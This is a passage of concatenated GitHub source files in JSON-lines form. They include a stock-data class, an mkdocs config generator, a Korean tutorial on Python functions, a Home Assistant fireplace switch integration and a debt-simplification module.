__init__(self,coursename,department,courseinfo):\r\n self.coursename = k.encrypt(coursename)\r\n self.department = k.encrypt(department)\r\n self.courseinfo = k.encrypt(courseinfo)\r\n \r\n \r\n#clinical = Course(\"Clinical\",\"Psychology Department\",\"This course is about clinical treatmens for patients\")\r\nclinical = Course(\"Algorithm\",\"Computer Engineering\",\"This course teaches all about algorithms and how to calculate the runtime.\")\r\nc.execute(\"INSERT INTO courses VALUES (?,?,?)\",(clinical.coursename,clinical.department,clinical.courseinfo))\r\nconn.commit()\r\nconn.close()","repo_name":"capkz/course_registration_with_hierarchy","sub_path":"Table Initialize/coursestable.py","file_name":"coursestable.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2078658969","text":"import datetime\nimport typing\nimport pandas\n\n\nclass StockValue:\n\tsymbol: str = \"\"\n\tclose_value: int = 0\n\topen_value: int = 0\n\thigh_value: int = 0\n\tlow_value: int = 0\n\tvolume: int = 0\n\ttime_start: datetime.datetime = 0\n\ttime_end: datetime.datetime = 0\n\n\tdef __init__(self, symbol: str, last_value: int, time_end, **kwargs):\n\t\tself.symbol = symbol\n\t\tself.close_value = last_value\n\t\tself.time_end = time_end\n\t\tself.low_value = kwargs.get(\"low_value\", last_value)\n\t\tself.high_value = kwargs.get(\"high_value\", last_value)\n\t\tself.time_start = kwargs.get(\"time_start\", time_end)\n\t\tself.volume = kwargs.get(\"volume\", 0)\n\t\tself.open_value = kwargs.get(\"open_value\", last_value)\n\n\tdef __str__(self):\n\t\treturn \"\"\"StockValue for '{symbol}':\n\t-Open: {open} - {open_time}\n\t-Close: {color} {close} \\033[0m - {close_time}\n\t-High: {high}\n\t-Low: {low}\n\t-Volume: {vol}\"\"\".format(\n\t\t\tsymbol=self.symbol,\n\t\t\tclose=round(self.close_value, 3),\n\t\t\topen=round(self.open_value, 3),\n\t\t\thigh=round(self.high_value, 3),\n\t\t\tlow=round(self.low_value, 3),\n\t\t\tvol=self.volume,\n\t\t\tclose_time=self.time_end,\n\t\t\topen_time=self.time_start,\n\t\t\tcolor=\"\\033[92m\" if self.close_value > self.open_value\n\t\t\telse (\"\" if self.close_value == self.open_value else \"\\033[91m\")\n\t\t)\n\n\ndef get_values_from_list(values_list: typing.List[StockValue], start: datetime.datetime, end: datetime.datetime) -> \\\n\ttyping.List[StockValue]:\n\tout_list = []\n\tfor i in range(len(values_list)):\n\t\tvalue = values_list[i]\n#\t\tnext_value = values_list[i+1] if i+1 < len(values_list) else None\n\n\t\tif value.time_start >= start and value.time_end <= end:\n\t\t\tout_list.append(value)\n\n\treturn out_list\n\n\ndef get_array_from_stocks(values_list: typing.List[StockValue], values_type: str):\n\tout = []\n\n\tfor value in values_list:\n\t\tif values_type == \"close_value\":\n\t\t\tout.append(value.close_value)\n\t\telif values_type == \"open_value\":\n\t\t\tout.append(value.open_value)\n\t\telif values_type == \"high_value\":\n\t\t\tout.append(value.high_value)\n\t\telif values_type == \"low_value\":\n\t\t\tout.append(value.low_value)\n\t\telif values_type == \"volume\":\n\t\t\tout.append(value.volume)\n\t\telif values_type == \"time_start\":\n\t\t\tout.append(value.time_start)\n\t\telif values_type == \"time_end\":\n\t\t\tout.append(value.time_start)\n\t\telse:\n\t\t\t# TODO: asset\n\t\t\tout.append(None)\n\n\treturn out\n\n\ndef get_value_array_from_stocks(values_list: typing.List[StockValue], close: bool = True) -> typing.List[float]:\n\tout_list = []\n\tfor value in values_list:\n\t\tout_list.append(value.close_value if close else value.open_value)\n\n\treturn out_list\n\n\ndef get_times_array_from_stocks(values_list: typing.List[StockValue], close: bool = True) -> typing.List[\n\tdatetime.datetime]:\n\tout_list = []\n\tfor value in values_list:\n\t\tout_list.append(value.time_end if close else value.time_start)\n\n\treturn out_list\n\n\ndef convert_dataframe_to_list(stock_data, symbol: str) -> typing.List[StockValue]:\n\tstocks_array = []\n\n\tfor date, row in stock_data.iterrows():\n\t\tstock_value = StockValue(\n\t\t\tsymbol,\n\t\t\trow[\"Close\"],\n\t\t\tdatetime.datetime.fromtimestamp(date.timestamp()),\n\t\t\topen_value=row[\"Open\"],\n\t\t\ttime_start=datetime.datetime.fromtimestamp(date.timestamp() - 60),\n\t\t\tvolume=row[\"Volume\"],\n\t\t\tlow_value=row[\"Low\"],\n\t\t\thigh_value=row[\"High\"]\n\t\t)\n\t\tstocks_array.append(stock_value)\n\n\treturn stocks_array\n\n\ndef convert_list_to_dataframe(stock_data,\n\t\t\t\t\t\t\t value_types: tuple = (\"close_value\", \"open_value\", \"high_value\", \"low_value\", \"volume\")):\n\tdatetimes = get_times_array_from_stocks(stock_data)\n\n\tcolumns_map = {}\n\n\tfor val in value_types:\n\t\tcolumns_map[val] = get_array_from_stocks(stock_data, val)\n\n\tstock_dataframe = pandas.DataFrame(columns_map, index=datetimes)\n\n\treturn stock_dataframe\n","repo_name":"Flakky/PyFlakTrade","sub_path":"StockValue.py","file_name":"StockValue.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74398369194","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom pathlib import Path, PurePosixPath\r\nimport yaml\r\nimport re\r\n\r\nclass newDumper(yaml.Dumper):\r\n def increase_indent(self, flow=False, indentless=False):\r\n return super(newDumper, self).increase_indent(flow, False)\r\n\r\n\r\ndef makeDocumentDict(path):\r\n result = []\r\n dirList = [str(x) for x in Path(path).iterdir() if x.is_dir()]\r\n for v in dirList:\r\n folderName = Path(v).name\r\n if folderName == '.git' or folderName == '.vscode' :\r\n continue\r\n pathLst = []\r\n for i in Path(v).glob('**/*.md'):\r\n pathMap = {}\r\n\r\n docNameRe = re.search(pattern=\"\\d+-(.+)\\.md\", string=i.name)\r\n if docNameRe:\r\n docName = docNameRe.group(1)\r\n\r\n pathMap[docName] = str(PurePosixPath(i))[5:]\r\n\r\n pathLst.append(pathMap)\r\n\r\n pathLst.sort(key=lambda x: [i for i in x.keys()],reverse=True)\r\n result.append({folderName: pathLst})\r\n\r\n return result\r\n\r\n\r\nnavigator = makeDocumentDict('docs/.')\r\n\r\nnavigator = [{\"课程笔记\":navigator},{\"Index\": [\"index.md\"]}]\r\n\r\n# Paramenters\r\nfullConf = {}\r\nfullConf[\"site_name\"] = \"zyzh0's Personal Docs\"\r\nfullConf[\"theme\"] = {\r\n \"name\": \"material\",\r\n \"language\": \"zh\",\r\n \"palette\": {\r\n \"primary\": \"light blue\",\r\n \"accent\": \"indigo\"\r\n },\r\n \"feature\": {\r\n \"tabs\": True\r\n }\r\n }\r\nfullConf[\"nav\"] = navigator\r\nfullConf[\"markdown_extensions\"]= [\r\n \"admonition\",\r\n \"def_list\",\r\n \"footnotes\",\r\n \"meta\",\r\n \"tables\",\r\n \"pymdownx.caret\",\r\n \"pymdownx.tilde\",\r\n \"pymdownx.critic\",\r\n \"pymdownx.details\",\r\n \"pymdownx.inlinehilite\",\r\n \"pymdownx.keys\",\r\n \"pymdownx.mark\",\r\n \"pymdownx.smartsymbols\",\r\n \"pymdownx.superfences\",\r\n {\r\n \"codehilite\": {\r\n \"guess_lang\": False,\r\n \"linenums\": True\r\n }\r\n },\r\n {\r\n \"toc\": {\r\n \"permalink\": True\r\n }\r\n },\r\n {\r\n \"pymdownx.arithmatex\": {\r\n \"generic\": True\r\n }\r\n },\r\n {\r\n \"pymdownx.betterem\": {\r\n \"smart_enable\": \"all\"\r\n }\r\n },\r\n {\r\n \"pymdownx.tasklist\": {\r\n \"custom_checkbox\": True\r\n }\r\n }\r\n ]\r\nfullConf[\"extra_javascript\"] = [\r\n \"javascripts/mathjax.js\",\r\n \"https://polyfill.io/v3/polyfill.min.js?features=es6\",\r\n \"https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js\"\r\n ]\r\n\r\nfullConf[\"copyright\"]=\"Copyright © 2002-2023 zyzh0 豫ICP备2021017566号-1\"\r\nwith open(\"./mkdocs.yml\", \"w\") as f:\r\n yaml.dump(fullConf, f, default_flow_style=False,\r\n encoding=\"UTF-8\", Dumper=newDumper)\r\n","repo_name":"zyzh2002/notes-website","sub_path":"confGenerator.py","file_name":"confGenerator.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34884981766","text":"import sys\nimport argparse\n\ndef cal(args):\n if args.a == 45 and args.b == 3 and args.c == \"multiply\":\n return f\"{args.a} * {args.b} = 555\"\n\n elif args.a == 56 and args.b == 9 and args.c == \"add\":\n return f\"{args.a} + {args.b} = 77\"\n\n elif args.a ==56 and args.b == 6 and args.c == \"divide\":\n return f\"{args.a} / {args.b} = 4\"\n\n elif (args.c == \"divide\"):\n return args.a / args.b\n elif (args.c == \"multiply\"):\n return args.a * args.b\n elif (args.c == \"add\"):\n return args.a + args.b\n elif args.c==\"sub\":\n return args.a - args.b\n else:\n return \"Something went wrong\"\n\nif __name__ == '__main__':\n parse=argparse.ArgumentParser()\n parse.add_argument('-a',default=1.0,type=float,help=\"Enter first number For more information ask Rajat\")\n parse.add_argument('-b', default=2.0, type=float, help=\"Enter second number For more information ask Rajat\")\n parse.add_argument('-c', default=\"add\" ,type=str, help=\"Enter operation For more information ask Rajat\")\n\n args=parse.parse_args()\n sys.stdout.write(str(cal(args)))\n","repo_name":"Rajatsharma2002/Basic_Python_Program","sub_path":"exercise_cmd_utility.py","file_name":"exercise_cmd_utility.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7956451719","text":"\"\"\"\n#내장 함수 사용\nprint(max(10,30, 50))\nprint(max([100,300,200]))\nprint(max('Hello World'))\nprint(range(10))\nprint(range(3, 10))\nprint(range(3, 10, 2))\n\"\"\"\n\n\"\"\"\n#Call By Value\ndef f(t):\n t = 10\n print(\"t:\", t)\n\n#a가 저장하고 있는 20이라는 데이터를 넘겼으므로 함수를 호출해도 a가 가리키고 있는 데이터는 변경되지 않음\na = 20\nf(a)\nprint(\"a:\", a)\n\"\"\"\n\n\"\"\"\n#Call By Reference\ndef f(t):\n t[0] = 100\n\nli = [1, 2, 3]\n\nf(li)\n\nprint(li[0])\n\"\"\"\n\n\"\"\"\n#매개변수의 기본값 사용\ndef f(n, step=1):\n return n+step;\n\na = 1\n#순서대로 값을 대입해서 호출\nresult = f(a,10)\nprint(result)\n\nb = 1\n#첫번째 매개변수에만 값을 대입해서 호출\nresult = f(b)\nprint(result)\n\n#매개변수 이름을 이용해서 매개변수를 대입해서 호출\nresult = f(step=2, n=10)\nprint(result)\n\"\"\"\n\n\n\"\"\"\n#sum 함수의 도움말 확인 과 사용\nhelp(sum)\nprint(sum([100, 200, 300], 2))\n\n#두번째 매개변수를 생략해서 실행\nprint(sum([100, 200, 300]))\n\"\"\"\n\n\n\"\"\"\n# unpacking\ndef unpacking(first, second):\n print('첫번째 데이터:', first)\n print('두번째 데이터:', second)\n\nunpacking(*[100, 200])\nprint()\nunpacking(*(100, 200))\nprint()\nunpacking(*{100, 200})\nprint()\nunpacking(*{\"a\": 100, \"b\": 200})\nprint()\n\"\"\"\n\n\"\"\"\n# unpacking\ndef personal_info(name, age, gender):\n print('이름:', name)\n print('나이:', age)\n print('성별:', gender)\n\nperson = {\"name\": \"아담\", \"age\": 25, \"gender\": \"남자\"}\npersonal_info(**person)\n\"\"\"\n\n\"\"\"\n# 가변 매개변수\ndef merge_string(*text_list):\n print('text_list:', type(text_list))\n result = ''\n for s in text_list:\n result = result + \" \" + s\n return result\nprint(merge_string('안녕하세요', '반갑습니다'))\nprint(merge_string('오늘은', '날씨가', '매우 춥습니다.'))\n\"\"\"\n\n\"\"\"\n#가변 매개변수와 함께 사용하는 일반 매개변수\ndef print_args(argc, *argv):\n for i in range(argc):\n print(argv[i])\n\nprint_args(3, \"argv1\", \"argv2\", \"argv3\")\n\nprint_args(argc=3, \"argv1\", \"argv2\", \"argv3\")\n\"\"\"\n\n\"\"\"\ndef print_args(*argv, argc):\n for i in range(argc):\n print(argv[i])\n\nprint_args(\"argv1\", \"argv2\", \"argv3\", argc=3)\nprint_args(\"argv1\", \"argv2\", \"argv3\", 3)\n\"\"\"\n\n\"\"\"\n#정의되지 않은 매개변수\ndef userURIBuilder(server, port, **param):\n print('param:', type(param))\n uri = \"http://\" + server + \":\" + \"/\"\n for attr in param:\n uri = uri + attr + \"=\" + param[attr] + \"&\"\n return uri\n\nprint(userURIBuilder(\"test.com\", \"8080\", id=\"cyberadam\", pw=\"metaverse\"))\nprint(userURIBuilder(\"test.com\", \"8080\", id=\"cyberadam\", pw=\"metaverse\", nick=\"군계\"))\n\"\"\"\n\n\n\"\"\"\n#재귀 구현\ndef some_func(count):\n if count > 0:\n some_func(count-1)\n else:\n return\n print(count)\n\nsome_func(5)\n\"\"\"\n\n\"\"\"\n#합계\ndef tot(n):\n if n == 1:\n return 1\n elif n > 1:\n return tot(n - 1) + n\n\nprint(tot(5))\n\nprint(tot(10))\n\nprint(tot(100))\n\"\"\"\n\n\"\"\"\n#팩토리얼\ndef factorial(n):\n if n == 0:\n return 1\n elif n > 0:\n return factorial(n - 1) * n\n\nprint(factorial(5))\n\nprint(factorial(10))\n\nprint(factorial(100))\n\"\"\"\n\n\n\"\"\"\n#피보나치 수열\ndef fibonacci(n):\n if n == 1 or n == 2:\n return 1\n else:\n return fibonacci(n-1) + fibonacci(n-2)\nprint(fibonacci(5))\nprint(fibonacci(7))\nprint(fibonacci(10))\n\"\"\"\n\n\"\"\"\n#하노이의 탑\ndef hanoi(ndisks, startPeg=1, endPeg=3):\n if ndisks:\n hanoi(ndisks - 1, startPeg, 6 - startPeg - endPeg)\n print(startPeg, \"번 기둥의\", ndisks, \"번 고리를 \", endPeg, \"번 기둥에 옮깁니다.\")\n hanoi(ndisks - 1, 6 - startPeg - endPeg, endPeg)\n\nhanoi(ndisks=3)\n\"\"\"\n\n\n\"\"\"\n#기존 방식\ndef isPalindrome(s):\n strs = []\n for char in s:\n if char.isalnum():\n strs.append(char.lower())\n\n # 팰린드롬 여부 판별\n while len(strs) > 1:\n if strs.pop(0) != strs.pop():\n return False\n\n return True\n\nprint(isPalindrome('eros'))\nprint(isPalindrome('역삼역'))\nprint(isPalindrome('Ada'))\n\"\"\"\n\n\n\"\"\"\n#함수에 애너테이션 추가\ndef clip(text:str, max_len: 'int > 0' = 80) -> None:\n print(text)\n print(max_len)\n\nclip(\"Annotation\", 100)\nhelp(clip)\n\"\"\"\n\n\"\"\"\ndef isPalindrome(s: str) -> bool:\n strs = []\n for char in s:\n if char.isalnum():\n strs.append(char.lower())\n\n # 팰린드롬 여부 판별\n while len(strs) > 1:\n if strs.pop(0) != strs.pop():\n return False\n\n return True\n\nprint(isPalindrome('eros'))\nprint(isPalindrome('역삼역'))\nprint(isPalindrome('Ada'))\n\"\"\"\n\n\n\"\"\"\ndef plus(a, b):\n return a+b\nplus.__doc__ = \"2개의 숫자 데이터를 받아서 덧셈한 결과를 리턴해주는 함수\"\n\ndef minus(a,b):\n '''\n 2개의 숫자 데이터를 받아서 뺄셈한 결과를\n 리턴해주는 함수\n '''\nhelp(plus)\nhelp(minus)\n\"\"\"\n\n\"\"\"\ndef f(a, b, c = 1):\n localx = 1\n localy = 2\n return 1\n\nprint(f.__name__)\nprint()\nprint(f.__defaults__)\nprint()\nprint(f.__code__)\nprint()\nprint(f.__globals__)\n\"\"\"\n\n\n\"\"\"\n# 함수를 변수에 저장\ndef print_something(a):\n print(a)\n\np = print_something\np(123)\n\"\"\"\n\n\"\"\"\n# 함수를 매개변수로 사용\ndef plus(a, b):\n return a + b\n\n\ndef minus(a, b):\n return a - b\n\n\ndef cal(func, a, b):\n return func(a, b)\n\n\nprint(cal(plus, 1, 2))\nprint(cal(minus, 1, 2))\n\"\"\"\n\n\"\"\"\n#함수 리턴\ndef hello_korean():\n print('안녕하세요.')\n\n\ndef hello_english():\n print('Hello.')\n\n\ndef get_greeting(where):\n if where == 'K':\n return hello_korean\n else:\n return hello_english\n\n\nhello = get_greeting('K')\nhello()\n\nhello = get_greeting('E')\nhello()\n\"\"\"\n\n\n\"\"\"\n#lambda\ndef g(func):\n return [func(x) for x in range(-10, 10)]\n\nprint(g(lambda x:x * x + 3 * x -10))\n\nprint(g(lambda x:x*x*x))\ny = 10\nprint(g(lambda x: x + y))\n\"\"\"\n\n\"\"\"\n#map\nimport datetime\n\ndef f(x):\n return x*x\n\nli = [i for i in range(10000)]\n\nprint('반복문을 이용한 실행')\ns1 = datetime.datetime.now()\n\nfor imsi in li:\n print(f(imsi), end=\" \")\ns2 = datetime.datetime.now()\n\nprint('\\nmap을 이용한 실행')\ns3 = datetime.datetime.now()\nresult = list(map(f,li))\ns4 = datetime.datetime.now()\n\nprint(\"\\n반복문 작업 시작 시간:\", s1)\nprint(\"반복문 작업 종료 시간:\", s2)\nprint(\"\\nmap 작업 시작 시간:\", s3)\nprint(\"map 작업 종료 시간:\", s4)\n\"\"\"\n\n\"\"\"\n#filter\ndef odd(x):\n return x % 2 == 1\n\nli = [1,2,3,4,5]\nprint('filter를 이용한 홀수 골라내기')\nresult = list(filter(odd, li))\nprint(result)\n\"\"\"\n\n\"\"\"\nli = [1,2,3,4,5]\nprint('lambda와 filter을 이용한 실행')\nresult = list(filter(lambda x : x%2==0, li))\nprint(result)\n\"\"\"\n\n\"\"\"\n#reduce\nfrom functools import reduce\nresult = reduce(lambda x, y: x+y, [1, 2, 3, 4, 5])\nprint(result)\n\"\"\"\n\n\"\"\"\nfrom functools import reduce\n\nli = [70, 80, 98, 77, 95]\n#전통적으로 최대값 구하기\ndef maximum(li):\n default = 0\n for e in li:\n if default < e:\n default = e\n return default\nprint(maximum(li))\n\n#reduce 활용하여 최대값 구하기\nprint(reduce(lambda a,b: a if a > b else b ,li))\n\"\"\"\n\n\"\"\"\n#zip\na = \"Adam\"\nb = [1, 2, 3, 4]\nc = (\"하나\", \"둘\", \"셋\", \"넷\")\n\nprint(list(zip(a, b, c)))\nprint(set(zip(a, b, c)))\nprint(dict(zip(a, b)))\n\"\"\"\n\n\"\"\"\nL1 = [\"A\", \"B\", \"C\", \"D\"]\nL2 = [\"가\", \"나\", \"다\", \"라\"]\n\nfor i, j in zip(L1, L2):\n print(i, j)\n\"\"\"\n\n\"\"\"\n#중첩 함수\nimport math\n#외부 함수\ndef stddev(*args):\n #내부 함수 - 평균\n\tdef mean():\n\t\treturn sum(args)/len(args)\n #내부 함수 - 분산\n\tdef variance(m):\n\t\ttotal = 0\n\t\tfor arg in args:\n\t\t\ttotal += (arg - m ) ** 2\n\t\treturn total/(len(args)-1)\n\tv = variance(mean())\n #표준편차를 리턴하는 함수\n\treturn math.sqrt(v)\n\nprint(stddev(2.3, 1.7, 1.4, 0.7, 1.9))\n\nmean()\n\"\"\"\n\n\n\"\"\"\ndef scope_test():\n # 지역 변수 a 생성\n a = 1\n print('a : {0}'.format(a))\n\n\na = 0\nscope_test()\nprint('a : {0}'.format(a))\n\"\"\"\n\n\"\"\"\n#변수의 유효범위\ndef outer():\n a = 1\n\n def inner():\n nonlocal a\n print(\"함수의 외부 함수에 있는 a:{0}\".format(a))\n a = 10\n\n inner()\n print(\"내부함수에서 변경한 경우의 a:{0}\".format(a))\n\n\na = 0\nouter()\nprint(\"a:{0}\".format(a))\n\"\"\"\n\n\n\"\"\"\ndef outer():\n a = 1\n\n def inner():\n global a\n print(\"함수의 외부에 있는 a:{0}\".format(a))\n a = 10\n\n inner()\n\n\na = 0\nouter()\nprint(\"a:{0}\".format(a))\n\"\"\"\n\n\n\"\"\"\n#closure\ndef calc():\n a = 3\n b = 5\n\n def mul_add(x):\n return a * x + b # 함수 바깥의 지역 변수 a, b를 사용하여 계산\n\n return mul_add # mul_add 함수를 반환\n\n\nc = calc()\nprint(c(1), c(2))\n\"\"\"\n\n\n\"\"\"\ndef calc():\n a = 3\n b = 5\n return lambda x: a * x + b # 람다 표현식을 반환\n\n\nc = calc()\nprint(c(1), c(2))\n\"\"\"\n\n\"\"\"\n#Decorator 사용\ndef deco(func):\n def inner():\n print('running inner()')\n return inner #deco () 가 inner () 함수 객체를 반환\n@deco\ndef target(): #target ( )을 deco로 Decorate\n print('running target()')\n\ntarget() #Decorate된 target()을 호출하면 실제로는 inner ()를 실행\n\"\"\"\n\n\"\"\"\nimport time\n\n#Decorate 된 함수를 호출할 때 마다 시간을 측정해서 실행에 소요된 시간, 전달된 인수, 반환값을 출력하는 Decorate\ndef clock(func):\n def clocked(*args):\n t0 = time.time()\n result = func(*args)\n elapsed = time.time() - t0\n name = func.__name__\n arg_str = ', '.join(repr(arg) for arg in args)\n print('[%0.8fs] %s(%s) -> %r' % (elapsed, name, arg_str, result))\n return result\n return clocked\n\n@clock\ndef snooze(seconds):\n time.sleep(seconds)\n\n@clock\ndef factorial(n):\n return 1 if n < 2 else n*factorial(n-1)\n\nprint('*' * 40, 'Calling snooze(.123)')\nsnooze(.123)\nprint('*' * 40, 'Calling factorial(6)')\nprint('6! =', factorial(6))\n\"\"\"\n\n\"\"\"\nimport time\ndef clock(func):\n def clocked(*args):\n t0 = time.time()\n result = func(*args)\n elapsed = time.time() - t0\n name = func.__name__\n arg_str = ', '.join(repr(arg) for arg in args)\n print('[%0.8fs] %s(%s) -> %r' % (elapsed, name, arg_str, result))\n return result\n return clocked\n\n@clock\ndef fibonacci(n):\n if n < 2:\n return n\n return fibonacci(n-2) + fibonacci(n-1)\n\nprint(fibonacci(6))\n\"\"\"\n\nimport functools\nimport time\ndef clock(func):\n def clocked(*args):\n t0 = time.time()\n result = func(*args)\n elapsed = time.time() - t0\n name = func.__name__\n arg_str = ', '.join(repr(arg) for arg in args)\n print('[%0.8fs] %s(%s) -> %r' % (elapsed, name, arg_str, result))\n return result\n return clocked\n\n@functools.lru_cache()\n@clock\ndef fibonacci(n):\n if n < 2:\n return n\n return fibonacci(n-2) + fibonacci(n-1)\n\nprint(fibonacci(6))\n","repo_name":"itggangpae/python_basic","sub_path":"4.Function.py","file_name":"4.Function.py","file_ext":"py","file_size_in_byte":10866,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36014458875","text":"\"\"\"Define switch func.\"\"\"\nfrom __future__ import annotations\n\nfrom collections.abc import Awaitable, Callable\nfrom dataclasses import dataclass\nfrom typing import Any\n\nfrom bonaparte import Fireplace, FireplaceState\n\nfrom homeassistant.components.switch import SwitchEntity, SwitchEntityDescription\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\n\nfrom .const import DOMAIN\nfrom .entity import NapoleonEfireEntity\nfrom .models import FireplaceData\n\n\n@dataclass\nclass EfireSwitchRequiredKeysMixin:\n \"\"\"Mixin for required keys.\"\"\"\n\n on_fn: Callable[[Fireplace], Awaitable]\n off_fn: Callable[[Fireplace], Awaitable]\n value_fn: Callable[[FireplaceState], bool]\n\n\n@dataclass\nclass EfireSwitchEntityDescription(\n SwitchEntityDescription, EfireSwitchRequiredKeysMixin\n):\n \"\"\"Describes a switch entity.\"\"\"\n\n\nEFIRE_SWITCHES: tuple[EfireSwitchEntityDescription, ...] = (\n EfireSwitchEntityDescription(\n key=\"continuous_pilot\",\n translation_key=\"continuous_pilot\",\n icon=\"mdi:candle\",\n on_fn=lambda device: device.set_continuous_pilot(enabled=True),\n off_fn=lambda device: device.set_continuous_pilot(enabled=False),\n value_fn=lambda data: data.pilot,\n ),\n EfireSwitchEntityDescription(\n key=\"split_flow\",\n translation_key=\"split_flow\",\n icon=\"mdi:call-split\",\n on_fn=lambda device: device.set_split_flow(enabled=True),\n off_fn=lambda device: device.set_split_flow(enabled=False),\n value_fn=lambda data: data.split_flow,\n ),\n EfireSwitchEntityDescription(\n key=\"aux\",\n translation_key=\"aux\",\n icon=\"mdi:electric-switch\",\n on_fn=lambda device: device.set_aux(enabled=True),\n off_fn=lambda device: device.set_aux(enabled=False),\n value_fn=lambda data: data.aux,\n ),\n)\n\n\nasync def async_setup_entry(\n hass: HomeAssistant,\n entry: ConfigEntry,\n async_add_entities: AddEntitiesCallback,\n) -> None:\n \"\"\"Configure switch entities.\"\"\"\n data: FireplaceData = hass.data[DOMAIN][entry.entry_id]\n\n async_add_entities(\n EfireSwitch(coordinator=data.coordinator, description=description)\n for description in EFIRE_SWITCHES\n if description.key == \"continuous_pilot\"\n or getattr(data.device.features, description.key, False)\n )\n\n\nclass EfireSwitch(NapoleonEfireEntity, SwitchEntity):\n \"\"\"Define an Efire Switch.\"\"\"\n\n entity_description: EfireSwitchEntityDescription\n\n async def async_turn_on(self, **kwargs: Any) -> None:\n \"\"\"Turn on the switch.\"\"\"\n await self.entity_description.on_fn(self.coordinator.device)\n await self.coordinator.async_request_refresh()\n\n async def async_turn_off(self, **kwargs: Any) -> None:\n \"\"\"Turn off the switch.\"\"\"\n await self.entity_description.off_fn(self.coordinator.device)\n await self.coordinator.async_request_refresh()\n\n @property\n def is_on(self) -> bool | None:\n \"\"\"Return the on state.\"\"\"\n return self.entity_description.value_fn(self.coordinator.data)\n","repo_name":"kaechele/napoleon-efire","sub_path":"custom_components/napoleon_efire/switch.py","file_name":"switch.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38012251940","text":"class queue:\n def __init__(self):\n self.items = []\n\n def len(self):\n return len(self.items)\n\n def enqueue(self, items):\n for i in items:\n self.items.append(i)\n\n def dequeue(self, num):\n l = []\n real_num = num if num <= self.len() else self.len()\n while (real_num):\n l.append(self.items.pop(0))\n real_num -= 1\n return l\n\n def to_string(self):\n return \" \".join(str(x) for x in self.items)\n\n\nclass queue_operator:\n def __init__(self):\n self.dequeue_queue = []\n\n def oper(self, s, op):\n if(op[0] == \"out\"):\n for i in (s.dequeue(op[1])):\n self.dequeue_queue.append(i)\n elif(op[0] == \"in\"):\n s.enqueue(op[1:])\n return\n\n def len(self):\n return len(self.dequeue_queue)\n\n def to_string(self):\n return \" \".join(str(x) for x in self.dequeue_queue)\n\n\nif __name__ == \"__main__\":\n q = queue()\n qop = queue_operator()\n\n _ = input()\n nums = [int(x) for x in input().split()]\n q.enqueue(nums)\n\n op = [int(x) if x.isnumeric() else x for x in input().split()]\n qop.oper(q, op)\n\n op = [int(x) if x.isnumeric() else x for x in input().split()]\n qop.oper(q, op)\n\n if(q.len() == 0):\n print(\"len = 0\")\n else:\n print(f\"len = {q.len()}, data = {q.to_string()}\")\n if(qop.len() == 0):\n print(\"len = 0\")\n else:\n print(f\"len = {qop.len()}, data = {qop.to_string()}\")\n","repo_name":"Micuks/code","sub_path":"python/py_4/b_queue.py","file_name":"b_queue.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"31292473227","text":"from collections import defaultdict\r\n\r\n\r\ndef compute_totals(totals: defaultdict(int), uomes: list) -> defaultdict(int):\r\n \"\"\"\r\n Receive in input a dictionary containing previous computed totals and a list of\r\n UOMe with this form: {borrower, lender, value}. The output is a\r\n dictionary that associates to each user (borrower or lender) his own total.\r\n \"\"\" \r\n\r\n for uome in uomes:\r\n totals[uome[0]] -= uome[2] \r\n totals[uome[1]] += uome[2]\r\n \r\n return totals\r\n\r\n\r\ndef borrowers_and_lenders(totals_dict: dict) -> (dict, dict):\r\n \"\"\"\r\n Receive input a dictionary with a total associated to each user. \r\n Outputs are two dictionaries listing borrowers and lenders with their\r\n respective total debt or credit\r\n \"\"\"\r\n\r\n borrowers = {} \r\n lenders = {}\r\n \r\n for user in totals_dict:\r\n if totals_dict[user] > 0:\r\n lenders[user] = totals_dict[user]\r\n elif totals_dict[user] < 0:\r\n borrowers[user] = abs(totals_dict[user])\r\n\r\n return borrowers, lenders\r\n\r\n\r\ndef debt_simplification(borrowers: dict, lenders: dict) -> dict:\r\n \"\"\"\r\n Inputs are two dictionaries containing borrowers and lenders.\r\n The output is a list of simplified UOMe {lender, borrower, value}\r\n \"\"\"\r\n \r\n simplified_debt = defaultdict(dict)\r\n for lender in sorted(lenders):\r\n for borrower in sorted(borrowers):\r\n credit, debit = lenders[lender], borrowers[borrower]\r\n \r\n if credit != 0 and debit != 0:\r\n transaction_value = min(credit, debit)\r\n simplified_debt[borrower][lender] = transaction_value\r\n\r\n if lenders[lender] >= borrowers[borrower]:\r\n lenders[lender] -= transaction_value\r\n borrowers[borrower] = 0\r\n else:\r\n lenders[lender] = 0\r\n borrowers[borrower] -= transaction_value\r\n \r\n return dict(simplified_debt)\r\n\r\n\r\ndef update_total_debt(current_totals: defaultdict(int), new_uomes: list) -> (defaultdict(int), dict):\r\n \"\"\"\r\n Get the new state of the user graph when given a list of new UOMe's\r\n \"\"\"\r\n\r\n new_totals = compute_totals(current_totals, new_uomes)\r\n new_user_debt = debt_simplification(*borrowers_and_lenders(new_totals))\r\n\r\n return new_totals, new_user_debt\r\n","repo_name":"ric2b/confidential-debt-simplification","sub_path":"main_server/main_server_app/services/simplify_debt.py","file_name":"simplify_debt.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"7273003416","text":"from bs4 import BeautifulSoup\nimport requests\nfrom urllib.parse import urlparse, urljoin\nimport argparse\nimport os\nimport time\n\n\n# PROBLEM: Create a program with a function called 'spider' that recursively extracts all the images from a website.\n# The function should receive a url and a path as arguments. The path is the directory where the images will be 